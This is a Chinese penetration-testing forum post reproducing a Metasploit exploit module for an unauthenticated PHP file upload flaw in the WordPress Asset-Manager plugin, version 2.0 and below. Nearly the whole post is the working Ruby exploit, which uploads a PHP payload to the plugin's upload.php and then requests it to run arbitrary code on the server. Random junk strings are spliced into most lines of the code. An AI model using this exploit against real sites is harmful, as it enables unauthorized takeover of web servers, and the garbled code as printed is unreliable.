找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2799|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。" k. z3 I, p0 o. I- g9 X; Y

; W0 S' T( C4 \##( _7 Z! C4 c9 A: `9 M4 H( x, ~% W
# This file is part of the Metasploit Framework and may be subject to0 F) V9 B% O: D/ J2 i! s, v% V3 i
# redistribution and commercial restrictions. Please see the Metasploit2 f# y' ?6 D+ B4 B- |0 ]
# Framework web site for more information on licensing and terms of use.
; a7 k6 [5 X4 d2 q, `#   http://metasploit.com/framework/0 f+ ]. ^8 g) u. G! F6 }2 e& Q( X
##
8 q1 P% N# w1 h8 s, ^% l3 `0 a 0 r% N7 _7 [2 r, A6 h3 M
require 'msf/core'& i+ j- n# u% N+ G' ?6 g- ?
require 'msf/core/exploit/php_exe'7 H& c$ P6 D9 C9 t& S1 i

: {2 T8 S6 l* p$ e0 ]) [class Metasploit3 < Msf::Exploit::Remote$ T# v/ v+ T- n5 I* N5 }
  Rank = ExcellentRanking
/ I' C" f; I6 ?. i/ ]( ^
, |/ o. l! L1 D: H' j0 p  include Msf::Exploit::Remote::HttpClient
7 h( f  y! w) [: U+ ~) {( W* U0 C  include Msf::Exploit:hpEXE
6 B* y' N) `$ G/ W& F4 b
  J2 G/ S! K# f! r/ ?; W% j/ v* L  def initialize(info = {})/ [/ L2 a0 i' s! S- Y4 m) E  o
    super(update_info(info,/ [  P( S3 U3 L" a8 m
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',( |  [% P2 H4 Q+ [
      'Description'    => %q{7 ?. J/ j: M! S; ]
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
# w. J" w& x0 N/ K7 N* K' W        plugin.  By abusing the upload.php file, a malicious user can upload a file to a2 Y) S  N& y4 _/ i8 r- U
        temp directory without authentication, which results in arbitrary code execution.
  ^; t# C, w4 j% C5 f" H      },. D8 }4 t  l) k) t) k8 P9 L# a
      'Author'         =>
1 `, k! j2 m, Y9 F- V/ A$ g9 ~4 B        [. V. H& m9 O$ \' S! W9 A
          'Sammy FORGIT', # initial discovery: O, g! t: ~+ G8 n) i
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module( R9 @0 ^& p5 D9 B1 C+ B1 v
        ],
6 J+ m6 \. {' x0 O      'License'        => MSF_LICENSE,  O7 B3 Q+ V' }! [; g$ g0 j' x
      'References'     =>
- t7 z; w+ Y. a5 S2 S        [+ c1 T% i1 n5 o/ Y, X
          [ 'OSVDB', '82653' ]," i8 ?2 O) w* j$ c* i* T1 |: a1 x
          [ 'BID', '53809' ],
0 ?- b. q, y5 D# @8 Q7 C          [ 'EDB', '18993' ],, ~& Y6 H$ q! p1 e
          [ 'URL', 'http:// www.myhack58.com /' ]
8 ?7 ~  p  D- n* g        ],
! p2 |' a- g  v      'Payload'       =>0 B0 c1 v" c6 z
        {7 r- N6 Z4 S: }+ ]8 {3 X4 o
          'BadChars' => "\x00",$ \. }* }- ?* t6 {! u/ V
        },
- v5 A1 A4 S" h8 [) j6 D0 y      'Platform'       => 'php',
9 ^- b3 n# q/ u      'Arch'           => ARCH_PHP,
3 O. E. ~+ B6 R6 N      'Targets'        =>
& C* L% r8 @( c4 ^& e" i# M6 K        [
$ ~; i1 z9 }2 K          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],; {1 m0 W. l' o- y4 s
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 P  w5 j% n5 N5 _" [* K3 H        ],
0 b" c: i: r1 K4 [. }; j      'DefaultTarget' => 0,* t/ f  d3 j: o& }
      'DisclosureDate' => 'May 26 2012'))- \2 ^0 z! C$ G5 ^+ K; g7 }

6 w/ O0 h; \* k  L    register_options(( f! K0 Z* E1 }( b' F
      [9 v  a; F. K3 i# `) |# [6 v5 @
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])! F9 B& D6 ^+ o$ U0 [: }8 N( q6 m
      ], self.class). K) F5 H. S# L$ N4 f( o
  end
* Z9 ?: x) I( |( h/ k1 Q/ e3 B ! }8 `; M  k& w! X" [  N0 K. t$ e
  def exploit6 J. [) e; _8 E6 q
    uri =  target_uri.path& I3 a9 d% h+ b+ ]  n1 k
    uri << '/' if uri[-1,1] != '/'* F8 G3 h' J( ~) D$ y8 w& r. Y
    peer = "#{rhost}:#{rport}"
0 \& ]: B! ^+ }% R! r* H    payload_name = "#{rand_text_alpha(5)}.php"
" M2 r* I# W# P  x1 ]: X, C    php_payload = get_write_exec_payload(:unlink_self=>true)+ L' X; o! A4 N! z4 Q! E, \

+ y1 h1 I- ]( T- d    data = Rex::MIME::Message.new
4 ?, A; [1 l0 U9 H$ m, `- P$ ?, S    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
- \8 `" {; S: R& O% f    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
* q3 N8 B' R6 h+ a   ~( A+ c# ]# v( M  M
    print_status("#{peer} - Uploading payload #{payload_name}")
+ L& ?1 b$ E  c0 K1 A    res = send_request_cgi({; H+ k  t* b6 }! s
      'method'  => 'POST',3 r( F, h8 q. r- Y
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",( T: y! b9 T8 j6 b" v2 B9 U& `
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
( f+ r" Z& I% P: p$ c6 f& L      'data'    => post_data2 M0 I- S' x5 t- A% ?" I
    })
) [% P- d, v% C
3 Z3 R! X: h% Y    if not res or res.code != 200 or res.body !~ /#{payload_name}/& T2 A- s4 Y% f" j; n& z  K7 {
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")% g6 x9 @0 x) U4 y/ a6 y4 T8 u/ Z& I
end+ Y' ~9 z2 h# a$ l

' E3 g$ G6 j7 S' N2 N5 q# A    print_status("#{peer} - Executing payload #{payload_name}"), _) ?( @# x% h# f" k0 ?
    res = send_request_raw({
* m7 P" s4 V2 C/ i! B0 W      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
2 Y8 Z# `9 a$ _* X, ~5 U3 F' ]7 O      'method'  => 'GET'  [+ J" c" d; S( Z, m( u( Z* w% F
    })0 Q7 N' M) w# v2 x7 r2 f2 E

! B6 T3 V: t) u8 k9 Z    if res and res.code != 200+ ^! R0 T! k  ^2 z7 S( _
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")' T* h2 F4 f6 l1 u$ B
    end$ i1 k/ @: i3 u
  end$ r0 ]3 L5 o4 m' {, N0 A' w! L7 h
end2 I3 z0 m7 w# M9 h" m
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表